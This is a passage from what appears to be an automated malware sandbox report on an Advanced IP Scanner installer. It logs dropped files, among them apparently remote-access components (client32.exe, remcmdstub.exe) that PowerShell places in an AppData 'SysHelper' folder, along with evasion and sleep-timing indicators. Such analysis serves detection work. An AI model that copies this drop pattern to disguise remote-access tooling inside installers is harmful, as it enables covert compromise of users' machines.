                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-NMSBJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-G1QBE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-E5GMR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-50T4N.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-IMIK4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-SNR73.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-R93D4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-LK5P7.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-OFA57.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-JD615.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-G1AVJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-HU2BS.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MLS3P.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-GSEGB.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-8NFDN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-51B0J.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-IG6SE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-BI69I.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-HE8PV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-JV2VP.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MRJ39.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-6GDPR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-GO656.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-94LO6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-CFBB0.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-S9HF4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-8I66A.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-KVJOO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-B6942.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-7T7KO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-GUGRV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2CC7N.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-RSL5S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-9QSUE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-4PSUK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-3DFK3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-PV5DC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-NDG98.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-37BEP.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-OL4PO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-UUUMK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-3ARML.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-7UOKJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-J88P9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QNSIE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-JMNJE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FM5PR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QK8GI.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-T33P0.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-NAJMA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-VU48S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-UNM54.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-4DCVH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-087J4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decisiongraph_7-78151
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decisiongraph_7-80961
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decisiongraph_7-81054
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decisiongraph_7-81242
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decisiongraph_7-81276
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-78359
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeAPI coverage: 6.2 %
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeAPI coverage: 2.9 %
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685A4F307_2_685A4F30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 3140Thread sleep time: -350000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 2160Thread sleep time: -44200s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 3140Thread sleep time: -1710250s >= -30000sJump to behavior
